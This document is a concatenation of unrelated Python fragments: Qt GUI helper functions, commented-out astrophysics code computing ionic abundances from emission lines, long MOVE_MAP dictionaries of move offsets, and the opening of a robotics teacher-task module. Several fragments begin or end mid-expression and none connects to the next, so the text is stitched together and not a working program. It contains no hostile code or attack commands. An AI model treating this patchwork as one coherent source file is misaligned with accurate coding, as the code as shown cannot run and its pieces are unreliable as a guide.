# (this will avoid calling shortcuts from another dockwidget
# since the context thing doesn't work quite well with these widgets)
action.setShortcutContext(context)
return action
def add_shortcut_to_tooltip(action, context, name):
"""Add the shortcut associated with a given action to its tooltip"""
action.setToolTip(action.toolTip() + ' (%s)' %
get_shortcut(context=context, name=name))
def add_actions(target, actions, insert_before=None):
"""Add actions to a menu"""
previous_action = None
target_actions = list(target.actions())
if target_actions:
previous_action = target_actions[-1]
if previous_action.isSeparator():
previous_action = None
for action in actions:
if (action is None) and (previous_action is not None):
if insert_before is None:
target.addSeparator()
else:
target.insertSeparator(insert_before)
elif isinstance(action, QMenu):
if insert_before is None:
target.addMenu(action)
else:
target.insertMenu(insert_before, action)
elif isinstance(action, QAction):
if insert_before is None:
target.addAction(action)
else:
target.insertAction(insert_before, action)
previous_action = action
def get_item_user_text(item):
"""Get QTreeWidgetItem user role string"""
return item.data(0, Qt.UserRole)
def set_item_user_text(item, text):
"""Set QTreeWidgetItem user role string"""
item.setData(0, Qt.UserRole, text)
def create_bookmark_action(parent, url, title, icon=None, shortcut=None):
"""Create bookmark action"""
return create_action( parent, title, shortcut=shortcut, icon=icon,
triggered=lambda u=url: programs.start_file(u) )
def create_module_bookmark_actions(parent, bookmarks):
"""
Create bookmark actions depending on module installation:
bookmarks = ((module_name, url, title), ...)
"""
actions = []
for key, url, title in bookmarks:
if programs.is_module_installed(key):
act = create_bookmark_action(parent, url, title)
actions.append(act)
return actions
def create_program_action(parent, text, name, icon=None, nt_name=None):
"""Create action to run a program"""
if is_text_string(icon):
icon = get_icon(icon)
if os.name == 'nt' and nt_name is not None:
name = nt_name
path = programs.find_program(name)
if path is not None:
return create_action(parent, text, icon=icon,
triggered=lambda: programs.run_program(name))
def create_python_script_action(parent, text, icon, package, module, args=[]):
"""Create action to run a GUI based Python script"""
if is_text_string(icon):
icon = get_icon(icon)
if programs.python_script_exists(package, module):
return create_action(parent, text, icon=icon,
triggered=lambda:
programs.run_python_script(package, module, args))
class DialogManager(QObject):
"""
Object that keep references to non-modal dialog boxes for another QObject,
typically a QMainWindow or any kind of QWidget
"""
def __init__(self):
QObject.__init__(self)
self.dialogs = {}
def show(self, dialog):
"""Generic method to show a non-modal dialog and keep reference
to the Qt C++ object"""
for dlg in list(self.dialogs.values()):
if to_text_string(dlg.windowTitle()) \
== to_text_string(dialog.windowTitle()):
dlg.show()
dlg.raise_()
break
else:
dialog.show()
self.dialogs[id(dialog)] = dialog
self.connect(dialog, SIGNAL('accepted()'),
lambda eid=id(dialog): self.dialog_finished(eid))
self.connect(dialog, SIGNAL('rejected()'),
lambda eid=id(dialog): self.dialog_finished(eid))
def dialog_finished(self, dialog_id):
"""Manage non-modal dialog boxes"""
return self.dialogs.pop(dialog_id)
def close_all(self):
"""Close all opened dialog boxes"""
for dlg in list(self.dialogs.values()):
dlg.reject()
def get_std_icon(name, size=None):
"""Get standard platform icon
Call 'show_std_icons()' for details"""
if not name.startswith('SP_'):
name = 'SP_'+name
icon = QWidget().style().standardIcon( getattr(QStyle, name) )
if size is None:
return icon
else:
return QIcon( icon.pixmap(size, size) )
def get_filetype_icon(fname):
"""Return file type icon"""
ext = osp.splitext(fname)[1]
if ext.startswith('.'):
ext = ext[1:]
return get_icon( "%s.png" % ext, get_std_icon('FileIcon') )
class ShowStdIcons(QWidget):
"""
Dialog showing standard icons
"""
def __init__(self, parent):
QWidget.__init__(self, parent)
layout = QHBoxLayout()
row_nb = 14
cindex = 0
for child in dir(QStyle):
if child.startswith('SP_'):
if cindex == 0:
col_layout = QVBoxLayout()
icon_layout = QHBoxLayout()
icon = get_std_icon(child)
label = QLabel()
label.setPixmap(icon.pixmap(32, 32))
icon_layout.addWidget( label )
icon_layout.addWidget( QLineEdit(child.replace('SP_', '')) )
col_layout.addLayout(icon_layout)
cindex = (cindex+1) % row_nb
if cindex == 0:
layout.addLayout(col_layout)
self.setLayout(layout)
self.setWindowTitle('Standard Platform Icons')
self.setWindowIcon(get_std_icon('TitleBarMenuButton'))
def show_std_icons():
"""
Show all standard Icons
"""
app = qapplication()
dialog = ShowStdIcons(None)
dialog.show()
import sys
| |
+ 0.49 * umath.pow(t4,-0.52) * (umath.exp(-4.544/t4))) / D
#
# y_I4471 = y0_I4471 / (1.0 + g_I4471)
# y_I5876 = y0_I5876 / (1.0 + g_I5876)
# y_I6678 = y0_I6678 / (1.0 + g_I6678)
#
# Magnitude = (3.0/5.0) * (y_I5876 + (1.0/3.0) * y_I4471 + (1.0/3.0) * y_I6678)
#
# elif methodology == 'Liu2000':
#
# if Parameter == 'O2_RecombCorr':
# t4 = data_dict['Temp'] / 10000
# OII_HII = data_dict['OII_HII_7319A']
# OII_RecombCor = 9.36 * umath.pow(t4, 0.44) * OII_HII
# Magnitude = OII_RecombCor
#
# if Parameter == 'N2_RecombCorr':
# t4 = data_dict['Temp'] / 10000
# NIII_HII = data_dict['NIII_HII']
# NII_RecombCor = 3.19 * umath.pow(t4, 0.30) * NIII_HII
# Magnitude = NII_RecombCor
#
# elif methodology == 'Epm2007':
#
# if Parameter == 'O2':
# ne = data_dict['Den']
# t4 = data_dict['Temp'] / 10000
# O2plus_Hplus = data_dict['OIII_HII']
# I7320_IBeta_R = 9.36 * umath.pow(t4, 0.44) * O2plus_Hplus
# logOII_logHII = -12 + umath.log10((data_dict['O2_7319A'] + data_dict['O2_7330A']) / data_dict['H1_4861A'] - I7320_IBeta_R) + 6.895 + 2.44/t4 - 0.58*umath.log10(t4) - umath.log10(1.0 + 0.0047 * ne)
# Magnitude = umath.pow(10, logOII_logHII)
#
# elif methodology == 'Fabian2006':
#
# if Parameter == 'HeII_HII':
# t4 = data_dict['Temp'] / 10000
# ne = data_dict['Den']
#
# y0_I4471 = 2.04 * umath.pow(t4,0.13) * data_dict['He1_4472A'] / data_dict['H1_4861A']
# y0_I5876 = 0.738 * umath.pow(t4,0.23) * data_dict['He1_5876A'] / data_dict['H1_4861A']
# y0_I6678 = 2.58 * umath.pow(t4,0.25) * data_dict['He1_6678A'] / data_dict['H1_4861A']
#
# D = 1.0 + 3110.0 * umath.pow(t4,-0.51) * (1.0/ne)
# g_I4471 = 6.11 * umath.pow(t4,0.02) * (umath.exp(-4.544)) / D
# g_I5876 = (7.12 * umath.pow(t4,0.14) * (umath.exp(-3.776/t4)) + 1.47 * umath.pow(t4,-0.28) * (umath.exp(-4.544/t4))) / D
# g_I6678 = (3.27 * umath.pow(t4,-0.41) * (umath.exp(-3.777/t4)) + 0.49 * umath.pow(t4,-0.52) * (umath.exp(-4.544/t4))) / D
#
#
# y_I4471 = y0_I4471 / (1.0 + g_I4471)
# y_I5876 = y0_I5876 / (1.0 + g_I5876)
# y_I6678 = y0_I6678 / (1.0 + g_I6678)
#
# Magnitude = (3.0/5.0) * (y_I5876 + (1.0/3.0) * y_I4471 + (1.0/3.0) * y_I6678)
#
# elif Parameter == 'HeIII_HII':
# t4 = data_dict['Temp'] / 10000
# y_PPI4686 = 0.084 * umath.pow(t4, 0.14) * data_dict['He2_4686A'] / data_dict['H1_4861A']
# Magnitude = y_PPI4686
#
# elif Parameter == 'OII_HII_7319A':
# t4 = data_dict['Temp'] / 10000
# ne = data_dict['Den']
# logOII_logHII = -12 + umath.log10((data_dict['O2_7319A'] + data_dict['O2_7330A']) / data_dict['H1_4861A']) + 6.895 + 2.44 / t4 - 0.58 * umath.log10(t4) - umath.log10(1 + 0.0047 * ne)
# Magnitude = umath.pow(10, logOII_logHII)
#
# elif methodology == 'PyNeb':
#
# if Parameter == 'HeII_HII':
#
# te = data_dict['Temp']
# ne = data_dict['Den']
#
# self.He1.getIonAbundance()
#
# y0_I4471 = self.He1_atom.getIonAbundance(int_ratio = 100 * data_dict['He1_4472A']/data_dict['H1_4861A'] , tem=te, den=ne, label='He1_4472A')
# y0_I5876 = self.He1_atom.getIonAbundance(int_ratio = 100 * data_dict['He1_5876A']/data_dict['H1_4861A'] , tem=te, den=ne, label='He1_5876A')
# y0_I6678 = self.He1_atom.getIonAbundance(int_ratio = 100 * data_dict['He1_6678A']/data_dict['H1_4861A'] , tem=te, den=ne, label='He1_6678A')
#
# # y0_I4471 = 2.04 * umath.pow(t4,0.13) * data_dict['He1_4472A'] / data_dict['H1_4861A']
# # y0_I5876 = 0.738 * umath.pow(t4,0.23) * data_dict['He1_5876A'] / data_dict['H1_4861A']
# # y0_I6678 = 2.58 * umath.pow(t4,0.25) * data_dict['He1_6678A'] / data_dict['H1_4861A']
#
# D = 1.0 + 3110.0 * umath.pow(t4,-0.51) * (1.0/ne)
# g_I4471 = 6.11 * umath.pow(t4,0.02) * (umath.exp(-4.544)) / D
# g_I5876 = (7.12 * umath.pow(t4,0.14) * (umath.exp(-3.776/t4)) + 1.47 * umath.pow(t4,-0.28) * (umath.exp(-4.544/t4))) / D
# g_I6678 = (3.27 * umath.pow(t4,-0.41) * (umath.exp(-3.777/t4)) + 0.49 * umath.pow(t4,-0.52) * (umath.exp(-4.544/t4))) / D
#
#
# y_I4471 = y0_I4471 / (1.0 + g_I4471)
# y_I5876 = y0_I5876 / (1.0 + g_I5876)
# y_I6678 = y0_I6678 / (1.0 + g_I6678)
#
# Magnitude = (3.0/5.0) * (y_I5876 + (1.0/3.0) * y_I4471 + (1.0/3.0) * y_I6678)
#
#
# return Magnitude
#
# def check_issues(self, magnitude, parameter_type):
#
# #Security check in the case we are getting a negative density:
# if parameter_type == 'density':
# if magnitude != None:
#
# if magnitude <= 0:
# return ufloat(50.0, 50.0)
# else:
# return magnitude
# return magnitude
#
# #Security check in case some flux is missing
# elif parameter_type == 'EmFlux':
# if magnitude[1] == None:
# return None
# else:
# return ufloat(magnitude[1], magnitude[2])
#
# class Chemical_Analysis(direct_Method):
#
# def __init__(self):
#
# direct_Method.__init__(self)
#
# #logSI_OI_Gradient = ufloat(-1.53, 0.05)
# logSI_OI_Gradient = ufloat(-1.78, 0.03)
#
# self.OI_SI = umath.pow(10, -logSI_OI_Gradient)
# self.He1 = RecAtom('He', 1)
# atomicData.setDataFile('he_i_rec_Pal12-Pal13.fits')
#
# def set_element(self, element):
#
# if element == 'Argon':
#
# self.argon_abundance_scheme()
#
# elif element == 'Oxygen':
#
# self.oxygen_abundance_scheme()
#
# elif element == 'Nitrogen':
#
# self.nitrogen_abundance_scheme()
#
# elif element == 'Sulfur':
#
# self.sulfur_abundance_scheme()
#
# elif element == 'Helium':
#
# self.helium_abundance_scheme()
#
# return
#
# def argon_abundance_scheme(self):
#
# #Determine the sulfur density and temperature
# T_SII, T_SIII, ne_SII = self.sulfur_density_scheme()
# T_OIII, T_OII = self.oxygen_temperature_scheme()
#
# #We try to calculate the T_ArIII from the sulfur lines
# T_ArIII = T_SIII
# T_ArIV = T_OIII
#
# #We try to calculate the T_ArIV from the sulfur lines, if not we use the Oxygen ones
# if (T_OIII == None) and (T_SIII != None):
# data_dict = {'Temp' : T_SIII}
# T_OIII_approx = self.empiric_formulae(data_dict, methodology = 'Epm2014', Ion='O3', Parameter = 'TOIII_approx_TSIII')
# T_ArIV = T_OIII_approx
#
# elif (T_SIII == None) and (T_OIII != None):
# data_dict = {'Temp' : T_OIII}
# T_SIII_approx = self.empiric_formulae(data_dict, methodology = 'Epm2014', Ion='S3', Parameter = 'TSIII_approx_TOIII')
# T_ArIV = T_SIII_approx
#
# #Calculate the ArIII abundance
# self.argon_IonAbundance(T_ArIII, ne_SII, Ion = 'Ar3', methodology = 'Haegele2008')
#
# #Calculate the ArIV abundance
# self.argon_IonAbundance(T_ArIV, ne_SII, Ion = 'Ar4', methodology = 'Haegele2008')
#
# def sulfur_density_scheme(self, TempIn = None):
#
# #We use this set up mechanism to calculate the electron density for other elements
# if TempIn == None:
# #Determine the Te[SII] and Te[SIII]
# T_SII = self.temperature_determination(Ion = 'S2', methodology = 'Haegele2008')
# T_SIII = self.temperature_determination(Ion = 'S3', methodology = 'Epm2014')
# else:
# T_SII = None
# T_SIII = TempIn
#
# #Determine ne_SII using the TSIII. If not available use TOIII to calculate TSIII
# #If a TempIn is not available it will use the standard procedure
# if T_SIII != None:
# ne_SII = self.density_determination(Ion = 'S2', Temp = T_SIII, methodology='Epm2014')
# else:
# T_OIII, T_OII = self.oxygen_temperature_scheme()
# data_dict = {}
# data_dict['Temp'] = T_OIII
# T_SIII = self.empiric_formulae(data_dict, methodology = 'Epm2014', Ion = 'S3', Parameter='TSIII_approx_TOIII')
# ne_SII = self.density_determination(Ion = 'S2', Temp = T_SIII, methodology='Epm2014')
#
# return T_SII, T_SIII, ne_SII
#
# def sulfur_abundance_scheme(self):
#
# #Get the sulfur electron density and temperature
# T_SII, T_SIII, ne_SII = self.sulfur_density_scheme(TempIn = None)
#
# self.Properties_dict['nSII'] = ne_SII
#
# #Determine the SII/HII abundance.
# #If the T_SII temperature is available use it. If not T_SII = T_SIII:
# if T_SII != None:
# self.sulfur_IonAbundance(T_SII, ne_SII, Ion = 'S2', methodology = 'Haegele2008')
# else:
# self.sulfur_IonAbundance(T_SIII, ne_SII, Ion = 'S2', methodology = 'Haegele2008')
#
# #Determine the SIII/HII abundance
# # self.sulfur_IonAbundance(T_SIII, ne_SII, Ion = 'S3', methodology = 'Haegele2008')
# self.sulfur_IonAbundance(T_SIII, ne_SII, Ion = 'S3', methodology = 'Vital2015')
#
# #Determine the S/H abundance
# #Include the Argon correction if the ArIV lines were observed
# if (self.Properties_dict['SII_HII'] != None) and (self.Properties_dict['SIII_HII'] != None):
# self.Properties_dict['SI_HI'] = self.Properties_dict['SII_HII'] + self.Properties_dict['SIII_HII']
#
# #Calculate the [SIV] correction factor from the Argon abundance
# #This structures enforces the calculation of the Argon apriori
# data_dict = {}
# data_dict['ArIII_HII'] = self.Properties_dict['ArIII_HII']
# data_dict['ArIV_HII'] = self.Properties_dict['ArIV_HII']
# data_dict['SIII_HII'] = self.Properties_dict['SIII_HII']
#
# #The code does not work if we introduce a None entry. However, in this correction there is still a quantity even if the ArIV is no there
# if data_dict['ArIV_HII'] == None:
# data_dict['ArIV_HII'] = ufloat(0.0,0.0)
#
# #Compute the SIV_HII component
# SIV_HII = self.empiric_formulae(data_dict, methodology = 'Angeles2015', Ion = 'S4', Parameter='SIV_HII')
#
# self.Properties_dict['SI_HI_ArCorr'] = self.Properties_dict['SII_HII'] + self.Properties_dict['SIII_HII'] + SIV_HII
#
# def oxygen_temperature_scheme(self):
#
# #Determine the Te[OIII]
# T_OIII = self.temperature_determination(Ion = 'O3', methodology = 'Epm2014')
#
# #Determine the Te[OII] using all the [OII] lines
# T_OII = self.temperature_determination(Ion = 'O2', methodology = 'Epm2014')
#
# #If lines not observed use approximation from T[OIII]
# if T_OII == None:
# T_OII = self.temperature_determination(Ion = 'O2', methodology = 'Epm2014', Temp = T_OIII)
#
# return T_OIII, T_OII
#
# def oxygen_abundance_scheme(self):
#
# #Determine the oxygen temperatures
# T_OIII, T_OII = self.oxygen_temperature_scheme()
#
# #Get the electron density from the sulfur lines using the oxigen temperature if observed. If not used sulfur lines
# T_SII, T_SIII, ne_SII = self.sulfur_density_scheme()
#
# #Calculate the OIII ion abundance
# self.oxygen_IonAbundance(Temp = T_OIII, Den = ne_SII, Ion = 'O3', methodology = 'Epm2014')
#
# #Calculate the OII ion abundance
# self.oxygen_IonAbundance(Temp = T_OII, Den = ne_SII, Ion = 'O2', methodology = 'Epm2014')
# self.oxygen_IonAbundance(Temp = T_OII, Den = ne_SII, Ion = 'O2', methodology = 'Fabian2006')
#
# #Correct | |
1318,
(-1, 2): 1319,
( 1, 2): 1320,
( 2, 1): 1321,
( 2,-1): 1322,
( 1,-2): 1323,
(-1,-2): 1324,
(-2,-1): 1325,
}
MOVE_MAP_46 = {
(-1, 0): 1326,
(-2, 0): 1327,
(-3, 0): 1328,
(-4, 0): 1329,
(-5, 0): 1330,
(-1, 1): 1331,
( 0, 1): 1332,
( 1, 1): 1333,
( 1, 0): 1334,
( 2, 0): 1335,
( 1,-1): 1336,
( 2,-2): 1337,
( 0,-1): 1338,
( 0,-2): 1339,
( 0,-3): 1340,
( 0,-4): 1341,
( 0,-5): 1342,
( 0,-6): 1343,
(-1,-1): 1344,
(-2,-2): 1345,
(-3,-3): 1346,
(-4,-4): 1347,
(-5,-5): 1348,
(-2, 1): 1349,
( 2, 1): 1350,
( 2,-1): 1351,
( 1,-2): 1352,
(-1,-2): 1353,
(-2,-1): 1354,
}
MOVE_MAP_47 = {
(-1, 0): 1355,
(-2, 0): 1356,
(-3, 0): 1357,
(-4, 0): 1358,
(-5, 0): 1359,
( 1, 0): 1360,
( 2, 0): 1361,
( 1,-1): 1362,
( 2,-2): 1363,
( 0,-1): 1364,
( 0,-2): 1365,
( 0,-3): 1366,
( 0,-4): 1367,
( 0,-5): 1368,
( 0,-6): 1369,
( 0,-7): 1370,
(-1,-1): 1371,
(-2,-2): 1372,
(-3,-3): 1373,
(-4,-4): 1374,
(-5,-5): 1375,
( 2,-1): 1376,
( 1,-2): 1377,
(-1,-2): 1378,
(-2,-1): 1379,
}
MOVE_MAP_48 = {
(-1, 0): 1380,
(-2, 0): 1381,
(-3, 0): 1382,
(-4, 0): 1383,
(-5, 0): 1384,
(-6, 0): 1385,
(-1, 1): 1386,
(-2, 2): 1387,
(-3, 3): 1388,
(-4, 4): 1389,
(-5, 5): 1390,
(-6, 6): 1391,
( 0, 1): 1392,
( 0, 2): 1393,
( 0, 3): 1394,
( 0, 4): 1395,
( 0, 5): 1396,
( 0, 6): 1397,
( 0, 7): 1398,
( 1, 1): 1399,
( 1, 0): 1400,
(-2, 1): 1401,
(-1, 2): 1402,
( 1, 2): 1403,
}
MOVE_MAP_49 = {
(-1, 0): 1404,
(-2, 0): 1405,
(-3, 0): 1406,
(-4, 0): 1407,
(-5, 0): 1408,
(-6, 0): 1409,
(-1, 1): 1410,
(-2, 2): 1411,
(-3, 3): 1412,
(-4, 4): 1413,
(-5, 5): 1414,
(-6, 6): 1415,
( 0, 1): 1416,
( 0, 2): 1417,
( 0, 3): 1418,
( 0, 4): 1419,
( 0, 5): 1420,
( 0, 6): 1421,
( 1, 1): 1422,
( 1, 0): 1423,
( 1,-1): 1424,
( 0,-1): 1425,
(-1,-1): 1426,
(-2, 1): 1427,
(-1, 2): 1428,
( 1, 2): 1429,
(-2,-1): 1430,
}
MOVE_MAP_50 = {
(-1, 0): 1431,
(-2, 0): 1432,
(-3, 0): 1433,
(-4, 0): 1434,
(-5, 0): 1435,
(-6, 0): 1436,
(-1, 1): 1437,
(-2, 2): 1438,
(-3, 3): 1439,
(-4, 4): 1440,
(-5, 5): 1441,
( 0, 1): 1442,
( 0, 2): 1443,
( 0, 3): 1444,
( 0, 4): 1445,
( 0, 5): 1446,
( 1, 1): 1447,
( 1, 0): 1448,
( 1,-1): 1449,
( 0,-1): 1450,
( 0,-2): 1451,
(-1,-1): 1452,
(-2,-2): 1453,
(-2, 1): 1454,
(-1, 2): 1455,
( 1, 2): 1456,
( 1,-2): 1457,
(-1,-2): 1458,
(-2,-1): 1459,
}
MOVE_MAP_51 = {
(-1, 0): 1460,
(-2, 0): 1461,
(-3, 0): 1462,
(-4, 0): 1463,
(-5, 0): 1464,
(-6, 0): 1465,
(-1, 1): 1466,
(-2, 2): 1467,
(-3, 3): 1468,
(-4, 4): 1469,
( 0, 1): 1470,
( 0, 2): 1471,
( 0, 3): 1472,
( 0, 4): 1473,
( 1, 1): 1474,
( 1, 0): 1475,
( 1,-1): 1476,
( 0,-1): 1477,
( 0,-2): 1478,
( 0,-3): 1479,
(-1,-1): 1480,
(-2,-2): 1481,
(-3,-3): 1482,
(-2, 1): 1483,
(-1, 2): 1484,
( 1, 2): 1485,
( 1,-2): 1486,
(-1,-2): 1487,
(-2,-1): 1488,
}
MOVE_MAP_52 = {
(-1, 0): 1489,
(-2, 0): 1490,
(-3, 0): 1491,
(-4, 0): 1492,
(-5, 0): 1493,
(-6, 0): 1494,
(-1, 1): 1495,
(-2, 2): 1496,
(-3, 3): 1497,
( 0, 1): 1498,
( 0, 2): 1499,
( 0, 3): 1500,
( 1, 1): 1501,
( 1, 0): 1502,
( 1,-1): 1503,
( 0,-1): 1504,
( 0,-2): 1505,
( 0,-3): 1506,
( 0,-4): 1507,
(-1,-1): 1508,
(-2,-2): 1509,
(-3,-3): 1510,
(-4,-4): 1511,
(-2, 1): 1512,
(-1, 2): 1513,
( 1, 2): 1514,
( 1,-2): 1515,
(-1,-2): 1516,
(-2,-1): 1517,
}
MOVE_MAP_53 = {
(-1, 0): 1518,
(-2, 0): 1519,
(-3, 0): 1520,
(-4, 0): 1521,
(-5, 0): 1522,
(-6, 0): 1523,
(-1, 1): 1524,
(-2, 2): 1525,
( 0, 1): 1526,
( 0, 2): 1527,
( 1, 1): 1528,
( 1, 0): 1529,
( 1,-1): 1530,
( 0,-1): 1531,
( 0,-2): 1532,
( 0,-3): 1533,
( 0,-4): 1534,
( 0,-5): 1535,
(-1,-1): 1536,
(-2,-2): 1537,
(-3,-3): 1538,
(-4,-4): 1539,
(-5,-5): 1540,
(-2, 1): 1541,
(-1, 2): 1542,
( 1, 2): 1543,
( 1,-2): 1544,
(-1,-2): 1545,
(-2,-1): 1546,
}
MOVE_MAP_54 = {
(-1, 0): 1547,
(-2, 0): 1548,
(-3, 0): 1549,
(-4, 0): 1550,
(-5, 0): 1551,
(-6, 0): 1552,
(-1, 1): 1553,
( 0, 1): 1554,
( 1, 1): 1555,
( 1, 0): 1556,
( 1,-1): 1557,
( 0,-1): 1558,
( 0,-2): 1559,
( 0,-3): 1560,
( 0,-4): 1561,
( 0,-5): 1562,
( 0,-6): 1563,
(-1,-1): 1564,
(-2,-2): 1565,
(-3,-3): 1566,
(-4,-4): 1567,
(-5,-5): 1568,
(-6,-6): 1569,
(-2, 1): 1570,
( 1,-2): 1571,
(-1,-2): 1572,
(-2,-1): 1573,
}
MOVE_MAP_55 = {
(-1, 0): 1574,
(-2, 0): 1575,
(-3, 0): 1576,
(-4, 0): 1577,
(-5, 0): 1578,
(-6, 0): 1579,
( 1, 0): 1580,
( 1,-1): 1581,
( 0,-1): 1582,
( 0,-2): 1583,
( 0,-3): 1584,
( 0,-4): 1585,
( 0,-5): 1586,
( 0,-6): 1587,
( 0,-7): 1588,
(-1,-1): 1589,
(-2,-2): 1590,
(-3,-3): 1591,
(-4,-4): 1592,
(-5,-5): 1593,
(-6,-6): 1594,
( 1,-2): 1595,
(-1,-2): 1596,
(-2,-1): 1597,
}
MOVE_MAP_56 = {
(-1, 0): 1598,
(-2, 0): 1599,
(-3, 0): 1600,
(-4, 0): 1601,
(-5, 0): 1602,
(-6, 0): 1603,
(-7, 0): 1604,
(-1, 1): 1605,
(-2, 2): 1606,
(-3, 3): 1607,
(-4, 4): 1608,
(-5, 5): 1609,
(-6, 6): 1610,
(-7, 7): 1611,
( 0, 1): 1612,
( 0, 2): 1613,
( 0, 3): 1614,
( 0, 4): 1615,
( 0, 5): 1616,
( 0, 6): 1617,
( 0, 7): 1618,
(-2, 1): 1619,
(-1, 2): 1620,
}
MOVE_MAP_57 = {
(-1, 0): 1621,
(-2, 0): 1622,
(-3, 0): 1623,
(-4, 0): 1624,
(-5, 0): 1625,
(-6, 0): 1626,
(-7, 0): 1627,
(-1, 1): 1628,
(-2, 2): 1629,
(-3, 3): 1630,
(-4, 4): 1631,
(-5, 5): 1632,
(-6, 6): 1633,
( 0, 1): 1634,
( 0, 2): 1635,
( 0, 3): 1636,
( 0, 4): 1637,
( 0, 5): 1638,
( 0, 6): 1639,
( 0,-1): 1640,
(-1,-1): 1641,
(-2, 1): 1642,
(-1, 2): 1643,
(-2,-1): 1644,
}
MOVE_MAP_58 = {
(-1, 0): 1645,
(-2, 0): 1646,
(-3, 0): 1647,
(-4, 0): 1648,
(-5, 0): 1649,
(-6, 0): 1650,
(-7, 0): 1651,
(-1, 1): 1652,
(-2, 2): 1653,
(-3, 3): 1654,
(-4, 4): 1655,
(-5, 5): 1656,
( 0, 1): 1657,
( 0, 2): 1658,
( 0, 3): 1659,
( 0, 4): 1660,
( 0, 5): 1661,
( 0,-1): 1662,
( 0,-2): 1663,
(-1,-1): 1664,
(-2,-2): 1665,
(-2, 1): 1666,
(-1, 2): 1667,
(-1,-2): 1668,
(-2,-1): 1669,
}
MOVE_MAP_59 = {
(-1, 0): 1670,
(-2, 0): 1671,
(-3, 0): 1672,
(-4, 0): 1673,
(-5, 0): 1674,
(-6, 0): 1675,
(-7, 0): 1676,
(-1, 1): 1677,
(-2, 2): 1678,
(-3, 3): 1679,
(-4, 4): 1680,
( 0, 1): 1681,
( 0, 2): 1682,
( 0, 3): 1683,
( 0, 4): 1684,
( 0,-1): 1685,
( 0,-2): 1686,
( 0,-3): 1687,
(-1,-1): 1688,
(-2,-2): 1689,
(-3,-3): 1690,
(-2, 1): 1691,
(-1, 2): 1692,
(-1,-2): 1693,
(-2,-1): 1694,
}
MOVE_MAP_60 = {
(-1, 0): 1695,
(-2, 0): 1696,
(-3, 0): 1697,
(-4, 0): 1698,
(-5, 0): 1699,
(-6, 0): 1700,
(-7, 0): 1701,
(-1, 1): 1702,
(-2, 2): 1703,
(-3, 3): 1704,
( 0, 1): 1705,
( 0, 2): 1706,
( 0, 3): 1707,
( 0,-1): 1708,
( 0,-2): 1709,
( 0,-3): 1710,
( 0,-4): 1711,
(-1,-1): 1712,
(-2,-2): 1713,
(-3,-3): 1714,
(-4,-4): 1715,
(-2, 1): 1716,
(-1, 2): 1717,
(-1,-2): 1718,
(-2,-1): 1719,
}
MOVE_MAP_61 = {
(-1, 0): 1720,
(-2, 0): 1721,
(-3, 0): 1722,
(-4, 0): 1723,
(-5, 0): 1724,
(-6, 0): 1725,
(-7, 0): 1726,
(-1, 1): 1727,
(-2, 2): 1728,
( 0, 1): 1729,
( 0, 2): | |
# Copyright (c) 2019 Horizon Robotics. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A variety of teacher tasks.
"""
import math
import numpy as np
import os
import gin
import itertools
import random
import json
from collections import deque, OrderedDict
from abc import abstractmethod
from absl import logging
import social_bot
from social_bot.teacher import TeacherAction
class Task(object):
"""Base class for Task.
A Task is for teaching a single task.
"""
compatible_agents = [
'pioneer2dx_noplugin',
'pr2_noplugin',
'icub',
'icub_with_hands',
'youbot_noplugin',
]
def __init__(self, env, max_steps=200, reward_weight=1.0):
"""
Setting things up during the initialization.
Args:
env (social_bot.GazeboEnvBase): an instance of Gym Environment
reward_weight(float): the weight of reward for caculating final_reward in teacher.teach()
Returns:
None
"""
self._env = env
self._world = env._world
self._agent = env._agent
self._max_steps = max_steps
self.reward_weight = reward_weight
self.task_vocab = ['hello', 'well', 'done', 'failed', 'to']
@abstractmethod
def run(self):
""" run() use yield to generate TeacherAction.
Structure of run():
```python
def run(self):
...
# agent_sentence is provided by Teacher using send() in TaskGroup.teach()
agent_sentence = yield # the first yielded value is ignored
...
# TeacherAction will be passed to Teacher as the return value of send() in TaskGroup.teach()
agent_sentence = yield TeacherAction(...)
...
agent_sentence = yield TeacherAction(...)
...
yield TeacherAction(done=True)
```
Returns:
A generator of TeacherAction
"""
pass
def task_specific_observation(self, agent):
"""
The extra infomation needed by the task if sparse states are used.
This can be overridden by the sub task. Note that this is only for the
case "Agent._use_image_observation" is False. For image case, the
image form camera of agent is used. For case of image with internal
states, Agent.get_internal_states() is used, which only returns
self joint positions and velocities.
Args:
agent (GazeboAgent): the agent
Returns:
np.array, the observations of the task for non-image case
"""
return np.array([])
def set_agent(self, agent):
""" Set the agent of task.
The agent can be overridden by this function. This might be useful when multi
agents share the same task or embodied teacher.
Args:
agent (GazeboAgent): the agent
"""
self._agent = agent
def _get_states_of_model_list(self,
model_list,
including_velocity=True,
including_rotation=False):
""" Get the poses and velocities from a model list.
Args:
model_list (list): a list of model names
including_velocity (bool): if Ture, the velocity of objects will be included.
including_rotation (bool): if Ture, the rotation of objects (in roll pitch yaw) will be included.
Returns:
np.array, the poses and velocities of the models
"""
model_states = []
for model_id in range(len(model_list)):
model = self._world.get_model(model_list[model_id])
model_states.append(model.get_pose()[0])
if including_rotation:
model_states.append(model.get_pose()[1])
if including_velocity:
model_states.append(model.get_velocities()[0])
model_states = np.array(model_states).flatten()
return model_states
def _random_move_object(self,
target,
random_range,
center_pos=np.array([0, 0]),
min_distance=0,
height=0):
""" Move an object to a random position.
Args:
target (pyagzebo.Model): the target to move
random_range (float): the range of the new position
center_pos (numpy.array): the center coordinates (x, y) of the random range
min_distance (float): the new position will not be closer than this distance
height (float): height offset
Returns:
np.array, the new position
"""
r = random.uniform(min_distance, random_range)
theta = random.random() * 2 * np.pi
loc = (center_pos[0] + r * np.cos(theta),
center_pos[1] + r * np.sin(theta), height)
target.set_pose((loc, (0, 0, 0)))
return np.array(loc)
@gin.configurable
class GoalTask(Task):
"""
A simple teacher task to find a goal.
For this task, the agent will receive reward 1 when it is close enough to the goal.
If it is moving away from the goal too much or still not close to the goal after max_steps,
it will get reward -1.
"""
def __init__(self,
env,
max_steps,
goal_name="ball",
distraction_list=[
'coke_can', 'table', 'car_wheel', 'plastic_cup', 'beer'
],
success_distance_thresh=0.5,
fail_distance_thresh=2.0,
distraction_penalty_distance_thresh=0,
distraction_penalty=0.5,
random_agent_orientation=False,
sparse_reward=True,
random_range=5.0,
polar_coord=True,
random_goal=False,
use_curriculum_training=False,
curriculum_distractions=True,
curriculum_target_angle=False,
